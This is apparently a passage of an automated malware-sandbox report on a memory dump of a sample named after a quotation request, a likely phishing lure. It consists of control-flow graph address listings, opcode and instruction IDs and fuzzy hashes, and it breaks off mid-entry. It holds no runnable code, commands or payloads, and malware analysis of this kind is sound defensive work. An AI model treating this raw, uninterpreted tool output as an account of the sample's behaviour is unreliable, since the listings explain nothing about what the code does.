                                                                                      • API String ID:
                                                                                      • Opcode ID: ab8836b348f9b3072746c85323d874d0870b41ef6e89c4789337a648a213ff69
                                                                                      • Instruction ID: edf4455febe40ee4fca68caaf97ada38da6bec4e65f7fc3b17d17b2974743234
                                                                                      • Opcode Fuzzy Hash: ab8836b348f9b3072746c85323d874d0870b41ef6e89c4789337a648a213ff69
                                                                                      • Instruction Fuzzy Hash: 34129A350312569FB6643B22A2AE16ABF69FB0F323704BE11F11AC01859FB544DACF61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2372 2ab0c8f-2ab0cc0 2374 2ab0cc2 2372->2374 2375 2ab0cc7-2ab0cdd call 2ab0780 2372->2375 2374->2375 2378 2ab0ce2 2375->2378 2379 2ab0cee-2ab104e call 2ab0780 * 13 2378->2379 2453 2ab1056-2ab1092 call 2ab27f0 call 2ab3cc0 call 2ab41a0 2379->2453 2457 2ab1098-2ab10c2 2453->2457 2460 2ab10cb-2ab10ce call 2ab5362 2457->2460 2461 2ab10d4-2ab10fe 2460->2461 2464 2ab1107-2ab110a call 2abc19e 2461->2464 2465 2ab1110-2ab113a 2464->2465 2468 2ab1143-2ab1146 call 2abc468 2465->2468 2469 2ab114c-2ab1176 2468->2469 2472 2ab117f-2ab1182 call 2abc738 2469->2472 2473 2ab1188-2ab11b2 2472->2473 2476 2ab11bb-2ab11be call 2abca08 2473->2476 2477 2ab11c4-2ab11f7 2476->2477 2480 2ab1203-2ab1209 call 2abccd8 2477->2480 2481 2ab120f-2ab124b 2480->2481 2484 2ab1257-2ab125d call 2abcfaa 2481->2484 2485 2ab1263-2ab129f 2484->2485 2488 2ab12ab-2ab12b1 call 2abd278 2485->2488 2489 2ab12b7-2ab13d2 2488->2489 2502 2ab13de-2ab13f0 call 2ab5362 2489->2502 2503 2ab13f6-2ab145c 2502->2503 2508 2ab1467-2ab1473 call 2abd548 2503->2508 2509 2ab1479-2ab1485 2508->2509 2510 2ab1490-2ab149c call 2abd548 2509->2510 2511 2ab14a2-2ab14ae 2510->2511 2512 2ab14b9-2ab14c5 call 2abd548 2511->2512 2513 2ab14cb-2ab14d7 2512->2513 2514 2ab14e2-2ab14ee call 2abd548 2513->2514 2515 2ab14f4-2ab1500 2514->2515 2516 2ab150b-2ab1517 call 2abd548 2515->2516 2517 2ab151d-2ab1529 2516->2517 2518 2ab1534-2ab1540 call 2abd548 2517->2518 2519 2ab1546-2ab1552 2518->2519 2520 2ab155d-2ab1569 call 2abd548 2519->2520 2521 2ab156f-2ab158c 2520->2521 2523 2ab1597-2ab15a3 call 2abd548 2521->2523 2524 2ab15a9-2ab15b5 2523->2524 2525 2ab15c0-2ab15cc call 2abd548 2524->2525 2526 2ab15d2-2ab15de 2525->2526 2527 2ab15e9-2ab15f5 call 2abd548 2526->2527 2528 2ab15fb-2ab1607 2527->2528 2529 2ab1612-2ab161e call 2abd548 2528->2529 2530 2ab1624-2ab1630 2529->2530 2531 2ab163b-2ab1647 call 2abd548 2530->2531 2532 2ab164d-2ab1659 2531->2532 2533 2ab1664-2ab1670 call 2abd548 2532->2533 2534 2ab1676-2ab1682 2533->2534 2535 2ab168d-2ab1699 call 2abd548 2534->2535 2536 2ab169f-2ab16ab 2535->2536 2537 2ab16b6-2ab16c2 call 2abd548 2536->2537 2538 2ab16c8-2ab16d4 2537->2538 2539 2ab16df-2ab16eb call 2abd548 2538->2539 2540 2ab16f1-2ab17aa 2539->2540
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60116a524dcf85899d91495cf297a73db7d4b5076c0e89a692c44488be317a85
                                                                                      • Instruction ID: 12e941573cbed11a6fdfea7a28877b36394e9ceb2154820b2d3b88e2af952be6
                                                                                      • Opcode Fuzzy Hash: 60116a524dcf85899d91495cf297a73db7d4b5076c0e89a692c44488be317a85
                                                                                      • Instruction Fuzzy Hash: 73521E34901219CFDB68FF28EA94A9DBBB2FB88305F1055A9D409AB759DF705E81CF40

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 166b952183c44f3123270e67e1214271cc4f3a107ad9044757eb8a99f15eab8c
                                                                                      • Instruction ID: caa711348fa06067ebd52afa176e1bc6a711d646472b648f6c4ce59e7be7e275
                                                                                      • Opcode Fuzzy Hash: 166b952183c44f3123270e67e1214271cc4f3a107ad9044757eb8a99f15eab8c
                                                                                      • Instruction Fuzzy Hash: 01522E34901219CFDB68FF28EA94A9DBBB2FB88305F1055A9D409AB759DF705E81CF40

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2932 2ab76f1-2ab7725 2933 2ab772b-2ab774e 2932->2933 2934 2ab7b54-2ab7b58 2932->2934 2943 2ab77fc-2ab7800 2933->2943 2944 2ab7754-2ab7761 2933->2944 2935 2ab7b5a-2ab7b6e 2934->2935 2936 2ab7b71-2ab7b7f 2934->2936 2941 2ab7b81-2ab7b96 2936->2941 2942 2ab7bf0-2ab7c05 2936->2942 2950 2ab7b98-2ab7b9b 2941->2950 2951 2ab7b9d-2ab7baa 2941->2951 2952 2ab7c0c-2ab7c19 2942->2952 2953 2ab7c07-2ab7c0a 2942->2953 2947 2ab7848-2ab7851 2943->2947 2948 2ab7802-2ab7810 2943->2948 2956 2ab7763-2ab776e 2944->2956 2957 2ab7770 2944->2957 2954 2ab7c67 2947->2954 2955 2ab7857-2ab7861 2947->2955 2948->2947 2968 2ab7812-2ab782d 2948->2968 2958 2ab7bac-2ab7bed 2950->2958 2951->2958 2959 2ab7c1b-2ab7c56 2952->2959 2953->2959 2962 2ab7c6c-2ab7c9c 2954->2962 2955->2934 2960 2ab7867-2ab7870 2955->2960 2963 2ab7772-2ab7774 2956->2963 2957->2963 3008 2ab7c5d-2ab7c64 2959->3008 2966 2ab787f-2ab788b 2960->2966 2967 2ab7872-2ab7877 2960->2967 2995 2ab7c9e-2ab7cb4 2962->2995 2996 2ab7cb5-2ab7cbc 2962->2996 2963->2943 2971 2ab777a-2ab77dc 2963->2971 2966->2962 2969 2ab7891-2ab7897 2966->2969 2967->2966 2989 2ab783b 2968->2989 2990 2ab782f-2ab7839 2968->2990 2974 2ab7b3e-2ab7b42 2969->2974 2975 2ab789d-2ab78ad 2969->2975 3020 2ab77de 2971->3020 3021 2ab77e2-2ab77f9 2971->3021 2974->2954 2979 2ab7b48-2ab7b4e 2974->2979 2987 2ab78af-2ab78bf 2975->2987 2988 2ab78c1-2ab78c3 2975->2988 2979->2934 2979->2960 2993 2ab78c6-2ab78cc 2987->2993 2988->2993 2994 2ab783d-2ab783f 2989->2994 2990->2994 2993->2974 3002 2ab78d2-2ab78e1 2993->3002 2994->2947 3003 2ab7841 2994->3003 3005 2ab798f-2ab79ba call 2ab7538 * 2 3002->3005 3006 2ab78e7 3002->3006 3003->2947 3025 2ab79c0-2ab79c4 3005->3025 3026 2ab7aa4-2ab7abe 3005->3026 3010 2ab78ea-2ab78fb 3006->3010 3010->2962 3012 2ab7901-2ab7913 3010->3012 3012->2962 3015 2ab7919-2ab7931 3012->3015 3077 2ab7933 call 2ab80c9 3015->3077 3078 2ab7933 call 2ab80d8 3015->3078 3018 2ab7939-2ab7949 3018->2974 3019 2ab794f-2ab7952 3018->3019 3023 2ab795c-2ab795f 3019->3023 3024 2ab7954-2ab795a 3019->3024 3020->3021 3021->2943 3023->2954 3028 2ab7965-2ab7968 3023->3028 3024->3023 3024->3028 3025->2974 3027 2ab79ca-2ab79ce 3025->3027 3026->2934 3044 2ab7ac4-2ab7ac8 3026->3044 3031 2ab79d0-2ab79dd 3027->3031 3032 2ab79f6-2ab79fc 3027->3032 3033 2ab796a-2ab796e 3028->3033 3034 2ab7970-2ab7973 3028->3034 3047 2ab79df-2ab79ea 3031->3047 3048 2ab79ec 3031->3048 3036 2ab79fe-2ab7a02 3032->3036 3037 2ab7a37-2ab7a3d 3032->3037 3033->3034 3035 2ab7979-2ab797d 3033->3035 3034->2954 3034->3035 3035->2954 3042 2ab7983-2ab7989 3035->3042 3036->3037 3043 2ab7a04-2ab7a0d 3036->3043 3039 2ab7a49-2ab7a4f 3037->3039 3040 2ab7a3f-2ab7a43 3037->3040 3045 2ab7a5b-2ab7a5d 3039->3045 3046 2ab7a51-2ab7a55 3039->3046 3040->3008 3040->3039 3042->3005 3042->3010 3049 2ab7a0f-2ab7a14 3043->3049 3050 2ab7a1c-2ab7a32 3043->3050 3051 2ab7aca-2ab7ad4 call 2ab63e0 3044->3051 3052 2ab7b04-2ab7b08 3044->3052 3053 2ab7a5f-2ab7a68 3045->3053 3054 2ab7a92-2ab7a94 3045->3054 3046->2974 3046->3045 3055 2ab79ee-2ab79f0 3047->3055 3048->3055 3049->3050 3050->2974 3051->3052 3065 2ab7ad6-2ab7aeb 3051->3065 3052->3008 3057 2ab7b0e-2ab7b12 3052->3057 3060 2ab7a6a-2ab7a6f 3053->3060 3061 2ab7a77-2ab7a8d 3053->3061 3054->2974 3062 2ab7a9a-2ab7aa1 3054->3062 3055->2974 3055->3032 3057->3008 3063 2ab7b18-2ab7b25 3057->3063 3060->3061 3061->2974 3068 2ab7b27-2ab7b32 3063->3068 3069 2ab7b34 3063->3069 3065->3052 3074 2ab7aed-2ab7b02 3065->3074 3071 2ab7b36-2ab7b38 3068->3071 3069->3071 3071->2974 3071->3008 3074->2934 3074->3052 3077->3018 3078->3018
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aca53bcc6a42b08c26ec753f45c58470bfdf4b2187472318d37154f0b6f70b78
                                                                                      • Instruction ID: 9fadca3b1c2aa0601e5fac599294d2ffa59351bb59741ae9aa7ab67a58816849
                                                                                      • Opcode Fuzzy Hash: aca53bcc6a42b08c26ec753f45c58470bfdf4b2187472318d37154f0b6f70b78
                                                                                      • Instruction Fuzzy Hash: 4B125A31A00209CFCB15CF69D884AEEBBF6FF89314F158559E5069B2A2DBB0ED41CB50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3355 2ab5f38-2ab5f5a 3356 2ab5f5c-2ab5f60 3355->3356 3357 2ab5f70-2ab5f7b 3355->3357 3358 2ab5f88-2ab5f8f 3356->3358 3359 2ab5f62-2ab5f6e 3356->3359 3360 2ab6023-2ab604f 3357->3360 3361 2ab5f81-2ab5f83 3357->3361 3363 2ab5faf-2ab5fb8 3358->3363 3364 2ab5f91-2ab5f98 3358->3364 3359->3357 3359->3358 3368 2ab6056-2ab6098 3360->3368 3362 2ab601b-2ab6020 3361->3362 3441 2ab5fba call 2ab5f2a 3363->3441 3442 2ab5fba call 2ab5f38 3363->3442 3364->3363 3365 2ab5f9a-2ab5fa5 3364->3365 3367 2ab5fab-2ab5fad 3365->3367 3365->3368 3367->3362 3387 2ab60cb-2ab60cf 3368->3387 3388 2ab609a-2ab60ae 3368->3388 3369 2ab5fc0-2ab5fc2 3370 2ab5fca-2ab5fd2 3369->3370 3371 2ab5fc4-2ab5fc8 3369->3371 3375 2ab5fe1-2ab5fe3 3370->3375 3376 2ab5fd4-2ab5fd9 3370->3376 3371->3370 3374 2ab5fe5-2ab6004 call 2ab69a0 3371->3374 3380 2ab6019 3374->3380 3381 2ab6006-2ab600f 3374->3381 3375->3362 3376->3375 3380->3362 3435 2ab6011 call 2abaeba 3381->3435 3436 2ab6011 call 2abafad 3381->3436 3437 2ab6011 call 2abaef0 3381->3437 3384 2ab6017 3384->3362 3389 2ab6163-2ab6165 3387->3389 3390 2ab60d1-2ab60d9 3387->3390 3391 2ab60bd-2ab60c1 3388->3391 3392 2ab60b0-2ab60b6 3388->3392 3438 2ab6167 call 2ab62f0 3389->3438 3439 2ab6167 call 2ab6300 3389->3439 3393 2ab60db-2ab60e7 3390->3393 3394 2ab60e9-2ab60f6 3390->3394 3391->3387 3392->3391 3402 2ab60f8-2ab6102 3393->3402 3394->3402 3395 2ab616d-2ab6173 3396 2ab617f-2ab6186 3395->3396 3397 2ab6175-2ab617b 3395->3397 3400 2ab617d 3397->3400 3401 2ab61e1-2ab6240 3397->3401 3400->3396 3415 2ab6247-2ab625b 3401->3415 3405 2ab612f-2ab6133 3402->3405 3406 2ab6104-2ab6113 3402->3406 3407 2ab613f-2ab6143 3405->3407 3408 2ab6135-2ab613b 3405->3408 3417 2ab6123-2ab612d 3406->3417 3418 2ab6115-2ab611c 3406->3418 3407->3396 3412 2ab6145-2ab6149 3407->3412 3410 2ab6189-2ab61da 3408->3410 3411 2ab613d 3408->3411 3410->3401 3411->3396 3414 2ab614f-2ab6161 3412->3414 3412->3415 3414->3396 3417->3405 3418->3417 3435->3384 3436->3384 3437->3384 3438->3395 3439->3395 3441->3369 3442->3369
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0431ffcbbc085990ea291a815b9852ec59c6adacbf64e73bb852565f0c40b5cd
                                                                                      • Instruction ID: 24ad7694f0c8511b6ffe245e561a4d85b243c23e7f43be0c4aec056bfa0cbd3a
                                                                                      • Opcode Fuzzy Hash: 0431ffcbbc085990ea291a815b9852ec59c6adacbf64e73bb852565f0c40b5cd
                                                                                      • Instruction Fuzzy Hash: FF919B307042558FEB16AF35D898BAE7BFAFF88704F048469E5068B396DF748845CB91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e802b3628b2db70184b31453c157bbfc3b784854ab89e0de1e6b0ed28eef560b
                                                                                      • Instruction ID: 98f3186f15badf9f40699e3ed64d9269316ede7c47ee00f3008b59b085ac04dc
                                                                                      • Opcode Fuzzy Hash: e802b3628b2db70184b31453c157bbfc3b784854ab89e0de1e6b0ed28eef560b
                                                                                      • Instruction Fuzzy Hash: A481BE30A00505DFCB1ACF79C494AEABBBEBF89A18B158169D505D736ADF31EC41CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a3a817464646c6dc9ef40849a90fe9936523ac94463ed0abc8a5a367b7f9767
                                                                                      • Instruction ID: 1744316c6a1ca4d7edb6b8cc1da5a6c7aea0a0a6d385e65205d70ee8152d94fe
                                                                                      • Opcode Fuzzy Hash: 1a3a817464646c6dc9ef40849a90fe9936523ac94463ed0abc8a5a367b7f9767
                                                                                      • Instruction Fuzzy Hash: 0E8119315006069FC712CF68C4846DBBBBAFF45324B15C659DA5897396DB31F852CFA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b671189a82c4c18612fe2e2ea5c0806c370c42486b04e86073c8f0035a1342ba
                                                                                      • Instruction ID: 3c492d35d837514079090200e607f167f4ba5425d6ff19bdfb373737d2300876
                                                                                      • Opcode Fuzzy Hash: b671189a82c4c18612fe2e2ea5c0806c370c42486b04e86073c8f0035a1342ba
                                                                                      • Instruction Fuzzy Hash: FA711C34B006458FDB16DF6CC894AAEBBEDAF89244B1540A5E815DB3B2DF78DC41CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f0797aaf47e500cb7dd552d8ce7e30f0ea7c3888b5d6ae4560dc8ddf79a851e
                                                                                      • Instruction ID: aa42bf6d9566dff33b7d6db5871cf5989c82fb2c8c395664d29960ab3b383ddb
                                                                                      • Opcode Fuzzy Hash: 4f0797aaf47e500cb7dd552d8ce7e30f0ea7c3888b5d6ae4560dc8ddf79a851e
                                                                                      • Instruction Fuzzy Hash: 79510174D01218CFEB25DFE4D994BADBBB2FF89300F209129E805AB295DB755A46CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1807b975038620cf8e775d4649e01896f1203e5610621355b804d1d4f6c92524
                                                                                      • Instruction ID: ee097fcb03d14868ed837b62cf5e2403705e76bf4b32bc891749424c47da278e
                                                                                      • Opcode Fuzzy Hash: 1807b975038620cf8e775d4649e01896f1203e5610621355b804d1d4f6c92524
                                                                                      • Instruction Fuzzy Hash: DE5181307042559FDB01DF69C884BAFBBAAFF89314F148465EA08CB256DB71DC41CB91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 75d99b47328513e2c0043e02ff9d5735e277c2b565c9147f5ffea0a666bc2ebf
                                                                                      • Instruction ID: 07a8be7824540388e86f3803f78c299ac6762f04fdb0f8b559718af64c18b1b7
                                                                                      • Opcode Fuzzy Hash: 75d99b47328513e2c0043e02ff9d5735e277c2b565c9147f5ffea0a666bc2ebf
                                                                                      • Instruction Fuzzy Hash: 9951B474E01208DFDB58DFA9D5849DDBBF2BF89310F248169E819AB364DB30A801CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 29b207a01e0359990b5b1c051f5aa61613249c05d02b828039a3f1fb7ca7b967
                                                                                      • Instruction ID: 9f6aa1c2858c9e2587437699b926f8504678e5182e10e5388aadf91cb1e775cf
                                                                                      • Opcode Fuzzy Hash: 29b207a01e0359990b5b1c051f5aa61613249c05d02b828039a3f1fb7ca7b967
                                                                                      • Instruction Fuzzy Hash: A951A475E01208CFCB09EFA9D59499DBBF6FF89304B209469E805AB325DB31AD42CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 21efeb25ebf564fb4f8149b0b0f2c174e5ee1a890f034dbe200f352e041be317
                                                                                      • Instruction ID: 68827b11b3ee13d56b005bc52e96233c8f686b0e7880834828b6a081fff94e3c
                                                                                      • Opcode Fuzzy Hash: 21efeb25ebf564fb4f8149b0b0f2c174e5ee1a890f034dbe200f352e041be317
                                                                                      • Instruction Fuzzy Hash: 20419C35A04249DFCF16CFA8C888BDEBFB6AF89314F048455E905AB293DB74E954CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 66181f417252d98e2d2a0ef3d3cf4522fbc6672a39aac93f8a1426f8adbf7d21
                                                                                      • Instruction ID: 0507f38a1d7f6523c606bb8ee5510f93a9b506e6011932cb148e5f9a9b6adcc9
                                                                                      • Opcode Fuzzy Hash: 66181f417252d98e2d2a0ef3d3cf4522fbc6672a39aac93f8a1426f8adbf7d21
                                                                                      • Instruction Fuzzy Hash: 4031DD327002049FD709ABB5D8547AEBFFABFC8610F144469E90AD7296DF319C01CBA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 64719f0abf3109e8fd0ea892c395ac078a8cd0d42624eef968cdf1d621f750b8
                                                                                      • Instruction ID: a8d37124cc02147e99330ee68992cf2181aca85ee1ca09700a16131c2817930d
                                                                                      • Opcode Fuzzy Hash: 64719f0abf3109e8fd0ea892c395ac078a8cd0d42624eef968cdf1d621f750b8
                                                                                      • Instruction Fuzzy Hash: 3B41F1316042498FCB16CF64CC44BAEBBFAEF84314F04846AE8158B292DBB5DD45CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 97c13007bfe1072115266069a3de59abad717bd279131b627d8ec77e05673cc2
                                                                                      • Instruction ID: 633cedaedaf8803e8d072fa15da45a7b6aa537b1afd194a8c8f9bff60162626c
                                                                                      • Opcode Fuzzy Hash: 97c13007bfe1072115266069a3de59abad717bd279131b627d8ec77e05673cc2
                                                                                      • Instruction Fuzzy Hash: 0F31D5317043258BDF1956A988D43BEABAEAFC4215F14487EE916C7386EFB4CC44C7A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd57f85d5a04afc36d433238de376227320faad1b878d1a5e67e6ec6495dbc51
                                                                                      • Instruction ID: 3bbcef2c3cd2c0572571279cf5cfa3fa2987b9f8b5054776cb698bb6ffae419f
                                                                                      • Opcode Fuzzy Hash: cd57f85d5a04afc36d433238de376227320faad1b878d1a5e67e6ec6495dbc51
                                                                                      • Instruction Fuzzy Hash: 0231D130704209EFCB069F64D994AAE7FB6FF88314F408424F91597688CF79C9A1DBA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a47cebdecf4ab9f692d8953caeec6f561b888a990b5ec241bff8a8a9865c3910
                                                                                      • Instruction ID: 09828ea2ff9ba8605072ae533c27c518a7816956f09fb2db42d3cf53e82576a0
                                                                                      • Opcode Fuzzy Hash: a47cebdecf4ab9f692d8953caeec6f561b888a990b5ec241bff8a8a9865c3910
                                                                                      • Instruction Fuzzy Hash: 783147303151518FDB2A9B7DD8986BE7B6FAF84610B24146BE012CB293EFACDC80C755
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 036a12a2799bd27b6357d761a79ecd7873f39c7660dd4c084258c50e7fc85540
                                                                                      • Instruction ID: f7e4bae15969b3fbbf6ee1152359b150c221a0af7ac66bf51d62f1f6ee941290
                                                                                      • Opcode Fuzzy Hash: 036a12a2799bd27b6357d761a79ecd7873f39c7660dd4c084258c50e7fc85540
                                                                                      • Instruction Fuzzy Hash: 0A2180343042118FEB165B2D84947BF769EAFC8758F148039E506CB79AEFA9CC82D791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a80f80666bed90843ab44e4873e43c7b20ddbb985f9af9f83f3638e9d2dda4b
                                                                                      • Instruction ID: e2bbfc78987ee307cd57b8ceaa9d6b82942777541d6e4b3bc072c3f50ea7b97e
                                                                                      • Opcode Fuzzy Hash: 1a80f80666bed90843ab44e4873e43c7b20ddbb985f9af9f83f3638e9d2dda4b
                                                                                      • Instruction Fuzzy Hash: 9B21C7314019128BC255CB39C4C56D2BB5ABF8937C7158316C57C476EADB31E862CED0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3dbf2837e10f0d68a24cb4762033d2f79003ec7b2bf2ae5dce0824be20e7606c
                                                                                      • Instruction ID: 0215b7aafcd8a31d7d0006b25650609bbd448fe4d47774a4cdb72c5b6b7403d1
                                                                                      • Opcode Fuzzy Hash: 3dbf2837e10f0d68a24cb4762033d2f79003ec7b2bf2ae5dce0824be20e7606c
                                                                                      • Instruction Fuzzy Hash: 5F2104357056218FD7169B29C49496EB7BAFFC9B6570844B9E826CB799CF34CC02CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07bb89531bc27885a1a38323110537c8759815deb2b355dab738772ddbb9777e
